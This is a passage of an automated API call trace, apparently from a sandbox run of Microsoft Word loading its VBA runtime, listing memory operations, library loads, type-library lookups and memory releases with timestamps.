out: _Dst=0x343dbc) returned 0x0 [0061.461] CRetailMalloc_Realloc () returned 0x7759f50 [0061.461] CRetailMalloc_Free () returned 0x7dc0201 [0061.461] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e23d2 | out: _Dst=0x87fcf50) returned 0x0 [0061.461] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e23d2 | out: _Dst=0x343dbc) returned 0x0 [0061.461] CRetailMalloc_Free () returned 0x7dc0201 [0061.461] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e23f6 | out: _Dst=0x87fcf50) returned 0x0 [0061.461] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e23f6 | out: _Dst=0x343dbc) returned 0x0 [0061.461] CRetailMalloc_Free () returned 0x7dc0201 [0061.461] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e241e | out: _Dst=0x87fcf50) returned 0x0 [0061.462] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e241e | out: _Dst=0x343dbc) returned 0x0 [0061.462] CRetailMalloc_Free () returned 0x7dc0201 [0061.462] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e2442 | out: _Dst=0x87504e0) returned 0x0 [0061.462] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e2442 | out: _Dst=0x343dbc) returned 0x0 [0061.462] CRetailMalloc_Free () returned 0x1a060101 [0061.463] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e246a | out: _Dst=0x87fcf50) returned 0x0 [0061.465] CRetailMalloc_Realloc () returned 0x88f4250 [0061.469] CRetailMalloc_Realloc () returned 0x87cc360 [0061.485] CRetailMalloc_Realloc () returned 0x88b8ff8 [0061.486] CRetailMalloc_Realloc () returned 0x8934258 [0061.486] CRetailMalloc_Realloc () returned 0x8934258 [0061.486] CRetailMalloc_Realloc () returned 0x8934258 [0061.486] CRetailMalloc_Realloc () returned 0x880a7c0 [0061.486] CRetailMalloc_Realloc () returned 0x8934258 [0061.486] CRetailMalloc_Realloc () returned 0x8934258 [0061.486] CRetailMalloc_Free () returned 0x2f20001 [0061.486] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0061.487] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0061.488] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.489] GetProcAddress (hModule=0x74e20000, lpProcName=0x258) returned 0x74e78346 [0061.489] GetAsyncKeyState (vKey=3) returned 0 [0061.489] GetAsyncKeyState (vKey=3) returned 0 [0061.489] VarCmp (pvarLeft=0x344534, pvarRight=0x344524, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.489] VarBstrCat (in: bstrLeft="", bstrRight="-1988508626", pbstrResult=0x343530 | out: pbstrResult=0x343530) returned 0x0 [0061.489] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x343080, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.489] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x343080, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.490] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x343080, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.596] GetLastError () returned 0x0 [0061.597] WaitForInputIdle (hProcess=0x970, dwMilliseconds=0x2710) returned 0xffffffff [0061.597] CloseHandle (hObject=0x968) returned 1 [0061.597] CloseHandle (hObject=0x970) returned 1 [0061.641] CRetailMalloc_Free () returned 0x3c70501 [0061.644] _mbscpy_s (in: _Dst=0x3485bc, _DstSizeInBytes=0xe, _Src=0x5722676 | out: _Dst=0x3485bc) returned 0x0 [0061.644] _mbscpy_s (in: _Dst=0x3485c5, _DstSizeInBytes=0x5, _Src=0x3486b4 | out: _Dst=0x3485c5) returned 0x0 [0061.644] CRetailMalloc_Realloc () returned 0x8877350 [0061.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=72, lpMultiByteStr=0x348084, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\x18\x02", lpUsedDefaultChar=0x0) returned 72 [0061.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x34818c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0061.645] CRetailMalloc_Realloc () returned 0x8877578 [0061.645] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0061.645] ITypeLib:RemoteGetLibAttr (in: This=0x87ce660, ppTLibAttr=0x348038, pDummy=0x348220 | out: ppTLibAttr=0x348038, pDummy=0x348220*=0x0) returned 0x0 [0061.645] ITypeLib:RemoteGetDocumentation (in: This=0x87ce660, index=-1, refPtrFlags=0x348034, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220*=0x0) returned 0x0 [0061.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=64, lpMultiByteStr=0x348084, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 64 [0061.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x34818c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0061.653] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0061.654] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0 [0061.654] ITypeLib:RemoteGetLibAttr (in: This=0x87ceab0, ppTLibAttr=0x348038, pDummy=0x348220 | out: ppTLibAttr=0x348038, pDummy=0x348220*=0x0) returned 0x0 [0061.654] ITypeLib:RemoteGetDocumentation (in: This=0x87ceab0, index=-1, refPtrFlags=0x348034, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220*=0x0) returned 0x0 [0061.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x348084, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SysWOW64\\stdole2.tlbt Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0061.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x34818c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0061.655] CRetailMalloc_Alloc () returned 0x88777a0 [0061.655] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0061.656] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 2 [0061.656] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0061.656] ITypeLib:RemoteGetLibAttr (in: This=0x87cef00, ppTLibAttr=0x348038, pDummy=0x348220 | out: ppTLibAttr=0x348038, pDummy=0x348220*=0x0) returned 0x0 [0061.656] ITypeLib:RemoteGetDocumentation (in: This=0x87cef00, index=-1, refPtrFlags=0x348034, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x348220*=0x0) returned 0x0 [0061.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=69, lpMultiByteStr=0x348084, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 69 [0061.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x34818c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0061.657] CRetailMalloc_Alloc () returned 0x88a7278 [0061.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=64, lpMultiByteStr=0x347c10, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 64 [0061.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x347d18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0061.657] CRetailMalloc_Realloc () returned 0x88779c8 [0061.657] CRetailMalloc_Realloc () returned 0x8877e18 [0061.658] CRetailMalloc_Realloc () returned 0x61aa168 [0061.658] _mbscpy_s (in: _Dst=0x3485bc, _DstSizeInBytes=0xe, _Src=0xb082f56 | out: _Dst=0x3485bc) returned 0x0 [0061.658] _mbscpy_s (in: _Dst=0x3485c5, _DstSizeInBytes=0x5, _Src=0x3486b4 | out: _Dst=0x3485c5) returned 0x0 [0065.384] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0xc155, wParam=0x50, lParam=0x0) returned 0x0 [0065.399] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0xc155, wParam=0x50, lParam=0x0) returned 0x0 [0107.534] NtdllDefWindowProc_A (hWnd=0x201ac, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0137.988] _mbscpy_s (in: _Dst=0x347d9c, _DstSizeInBytes=0xf, _Src=0xb082f56 | out: _Dst=0x347d9c) returned 0x0 [0137.988] _mbscpy_s (in: _Dst=0x347da5, _DstSizeInBytes=0x6, _Src=0x347e94 | out: _Dst=0x347da5) returned 0x0 [0138.137] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.137] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.138] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.140] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c8) returned 0x7502fcf8 [0138.140] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.140] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.140] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.141] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.142] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c5) returned 0x7502f898 [0138.142] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.142] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.142] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.143] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.144] GetProcAddress (hModule=0x74e20000, lpProcName=0x2cd) returned 0x7501f4a9 [0138.144] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.145] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.145] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.146] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.147] GetProcAddress (hModule=0x74e20000, lpProcName=0x268) returned 0x74ea46c2 [0138.147] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.147] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.148] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.149] GetProcAddress (hModule=0x74e20000, lpProcName=0x258) returned 0x74e78346 [0138.150] CExposedDocFile::Release () returned 0x6 [0138.150] CExposedDocFile::Release () returned 0x5 [0138.150] CExposedDocFile::Release () returned 0x4 [0138.150] CExposedDocFile::Release () returned 0x3 [0138.150] CExposedDocFile::Release () returned 0x2 [0138.150] CExposedDocFile::Release () returned 0x1 [0138.150] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.150] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.151] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.152] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c8) returned 0x7502fcf8 [0138.185] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.185] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.185] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.186] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.187] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c5) returned 0x7502f898 [0138.187] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.187] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.187] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.187] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.188] GetProcAddress (hModule=0x74e20000, lpProcName=0x2cd) returned 0x7501f4a9 [0138.188] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.188] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.188] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.189] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.190] GetProcAddress (hModule=0x74e20000, lpProcName=0x268) returned 0x74ea46c2 [0138.190] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0138.190] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0138.191] SetErrorMode (uMode=0x8001) returned 0x8001 [0138.191] GetProcAddress (hModule=0x74e20000, lpProcName=0x258) returned 0x74e78346 [0138.192] CRetailMalloc_Free () returned 0x3310001 [0138.209] CExposedDocFile::Release () returned 0x1 [0138.209] CExposedDocFile::Release () returned 0x0 [0138.209] CExposedDocFile::Release () returned 0x0 [0138.231] CRetailMalloc_Realloc () returned 0x0 [0138.231] CRetailMalloc_Alloc () returned 0x86e5208 [0138.231] CRetailMalloc_Free () returned 0x1d40001 [0138.231] CRetailMalloc_Free () returned 0x3900001 [0138.231] CRetailMalloc_Free () returned 0x7ee0001 [0138.231] CRetailMalloc_Free () returned 0x1ba0001 [0138.231] CRetailMalloc_Free () returned 0x1 [0138.231] CRetailMalloc_Free () returned 0x38b0001 [0138.231] CRetailMalloc_Free () returned 0x5ff0001 [0138.231] CRetailMalloc_Free () returned 0x1340001 [0138.231] CRetailMalloc_Free () returned 0x39e0001 [0138.231] CRetailMalloc_Free () returned 0x1de0001 [0138.231] CRetailMalloc_Free () returned 0x1 [0138.231] CRetailMalloc_Free () returned 0x16a0001 [0138.231] CRetailMalloc_Free () returned 0x11a0001 [0138.231] CRetailMalloc_Free () returned 0x1410001 [0138.231] CRetailMalloc_Free () returned 0x1 [0138.231] CRetailMalloc_Free () returned 0x1 [0138.231] CRetailMalloc_Free () returned 0x1 [0138.232] VirtualFree (lpAddress=0x62e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.233] VirtualFree (lpAddress=0x62f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.234] VirtualFree (lpAddress=0x6340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.235] VirtualFree (lpAddress=0x65c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.236] VirtualFree (lpAddress=0x65d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.238] VirtualFree (lpAddress=0x65e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.238] VirtualFree (lpAddress=0x6cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.239] VirtualFree (lpAddress=0x6d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.240] VirtualFree (lpAddress=0x6d70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.241] VirtualFree (lpAddress=0x6d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.242] VirtualFree (lpAddress=0x6d90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.242] VirtualFree (lpAddress=0x6da0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.243] VirtualFree (lpAddress=0x6db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.244] VirtualFree (lpAddress=0x6dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.245] VirtualFree (lpAddress=0x6dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.246] CRetailMalloc_Free () returned 0x1ab0001 [0138.246] CRetailMalloc_Free () returned 0x3810001 [0138.246] CRetailMalloc_Free () returned 0x1 [0138.246] CRetailMalloc_Realloc () returned 0x0 [0138.246] CRetailMalloc_Alloc () returned 0x86e5fb8 [0138.246] CRetailMalloc_Free () returned 0x1de0001 [0138.246] CRetailMalloc_Free () returned 0x3590001 [0138.246] CRetailMalloc_Free () returned 0x6920001 [0138.246] CRetailMalloc_Free () returned 0x1 [0138.246] CRetailMalloc_Free () returned 0x3680001 [0138.246] CRetailMalloc_Free () returned 0x2c90001 [0138.246] CRetailMalloc_Free () returned 0x1010001 [0138.246] CRetailMalloc_Free () returned 0x3980001 [0138.246] CRetailMalloc_Free () returned 0x3940001 [0138.246] CRetailMalloc_Free () returned 0x1 [0138.246] CRetailMalloc_Free () returned 0x5e40001 [0138.246] CRetailMalloc_Free () returned 0xffff0001 [0138.246] CRetailMalloc_Free () returned 0xf00001 [0138.247] CRetailMalloc_Free () returned 0x16d0001 [0138.247] CRetailMalloc_Free () returned 0x1 [0138.247] CRetailMalloc_Free () returned 0x1 [0138.247] CRetailMalloc_Free () returned 0x1 [0138.247] VirtualFree (lpAddress=0x9b70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.247] VirtualFree (lpAddress=0xa0d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.248] VirtualFree (lpAddress=0xa0e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.249] VirtualFree (lpAddress=0xa0f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.250] VirtualFree (lpAddress=0xa100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.251] VirtualFree (lpAddress=0xa110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.251] VirtualFree (lpAddress=0xa120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.252] VirtualFree (lpAddress=0xa130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.253] VirtualFree (lpAddress=0xacc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.254] VirtualFree (lpAddress=0xacd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.255] VirtualFree (lpAddress=0xace0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.255] VirtualFree (lpAddress=0xad00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.256] VirtualFree (lpAddress=0xad10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.257] VirtualFree (lpAddress=0xad30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.258] VirtualFree (lpAddress=0xad40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.259] VirtualFree (lpAddress=0xad50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.259] VirtualFree (lpAddress=0xad60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.260] VirtualFree (lpAddress=0xad70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.261] VirtualFree (lpAddress=0xad80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.262] VirtualFree (lpAddress=0xad90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.263] VirtualFree (lpAddress=0xada0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.264] VirtualFree (lpAddress=0xadb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.265] VirtualFree (lpAddress=0xadd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.266] VirtualFree (lpAddress=0xaee0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.267] VirtualFree (lpAddress=0xaef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.268] VirtualFree (lpAddress=0xaf00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.268] VirtualFree (lpAddress=0xaf20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.269] VirtualFree (lpAddress=0xaf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.270] VirtualFree (lpAddress=0xaf40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.271] VirtualFree (lpAddress=0xaf50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.271] VirtualFree (lpAddress=0xaf60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.272] VirtualFree (lpAddress=0xaf70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.273] VirtualFree (lpAddress=0xaf80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.274] VirtualFree (lpAddress=0xaf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.274] VirtualFree (lpAddress=0xafb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.275] VirtualFree (lpAddress=0xafc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.276] VirtualFree (lpAddress=0xafd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.277] VirtualFree (lpAddress=0xafe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.277] VirtualFree (lpAddress=0xaff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.278] VirtualFree (lpAddress=0xb000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.279] VirtualFree (lpAddress=0xb020000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.280] VirtualFree (lpAddress=0xb030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.281] VirtualFree (lpAddress=0xb040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.281] VirtualFree (lpAddress=0xb050000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.282] VirtualFree (lpAddress=0xb060000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.283] VirtualFree (lpAddress=0xb070000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.284] VirtualFree (lpAddress=0xb090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.285] VirtualFree (lpAddress=0xb0a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.286] VirtualFree (lpAddress=0xb0b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.286] VirtualFree (lpAddress=0xb0c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.287] CRetailMalloc_Free () returned 0x7350001 [0138.287] CRetailMalloc_Free () returned 0x3770001 [0138.287] CRetailMalloc_Free () returned 0x1 [0138.288] CRetailMalloc_Realloc () returned 0x0 [0138.288] CRetailMalloc_Alloc () returned 0x86e5fc8 [0138.288] CRetailMalloc_Free () returned 0x3940001 [0138.288] CRetailMalloc_Free () returned 0x3270001 [0138.288] CRetailMalloc_Free () returned 0x6c20001 [0138.288] CRetailMalloc_Free () returned 0x1 [0138.288] CRetailMalloc_Free () returned 0x3180001 [0138.288] CRetailMalloc_Free () returned 0x6b00001 [0138.288] CRetailMalloc_Free () returned 0x1560001 [0138.288] CRetailMalloc_Free () returned 0x3a00001 [0138.288] CRetailMalloc_Free () returned 0x3960001 [0138.288] CRetailMalloc_Free () returned 0x1 [0138.288] CRetailMalloc_Free () returned 0x1b50001 [0138.288] CRetailMalloc_Free () returned 0x10c0001 [0138.288] CRetailMalloc_Free () returned 0x1360001 [0138.288] CRetailMalloc_Free () returned 0x1 [0138.288] CRetailMalloc_Free () returned 0x18080001 [0138.288] CRetailMalloc_Free () returned 0x1 [0138.288] VirtualFree (lpAddress=0xb0d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.289] VirtualFree (lpAddress=0xb0e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.290] VirtualFree (lpAddress=0xb0f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.290] VirtualFree (lpAddress=0xb100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.291] VirtualFree (lpAddress=0xb110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.292] VirtualFree (lpAddress=0xb120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.294] VirtualFree (lpAddress=0xb130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.295] VirtualFree (lpAddress=0xb150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.296] VirtualFree (lpAddress=0xb160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.297] VirtualFree (lpAddress=0xb170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.299] CRetailMalloc_Free () returned 0x1790001 [0138.299] CRetailMalloc_Free () returned 0x3540001 [0138.299] CRetailMalloc_Free () returned 0x4030001 [0138.299] CRetailMalloc_Realloc () returned 0x0 [0138.299] CRetailMalloc_Alloc () returned 0x86e6038 [0138.299] CRetailMalloc_Free () returned 0x3960001 [0138.299] CRetailMalloc_Free () returned 0x3220001 [0138.299] CRetailMalloc_Free () returned 0x7f40001 [0138.299] CRetailMalloc_Free () returned 0x1 [0138.299] CRetailMalloc_Free () returned 0x3ae0001 [0138.299] CRetailMalloc_Free () returned 0x6e90001 [0138.299] CRetailMalloc_Free () returned 0x1450001 [0138.299] CRetailMalloc_Free () returned 0x3aa0001 [0138.299] CRetailMalloc_Free () returned 0x3a40001 [0138.299] CRetailMalloc_Free () returned 0x1 [0138.300] CRetailMalloc_Free () returned 0x1c40001 [0138.300] CRetailMalloc_Free () returned 0x560001 [0138.300] CRetailMalloc_Free () returned 0x1780001 [0138.300] CRetailMalloc_Free () returned 0x1 [0138.300] CRetailMalloc_Free () returned 0x1 [0138.300] CRetailMalloc_Free () returned 0x1 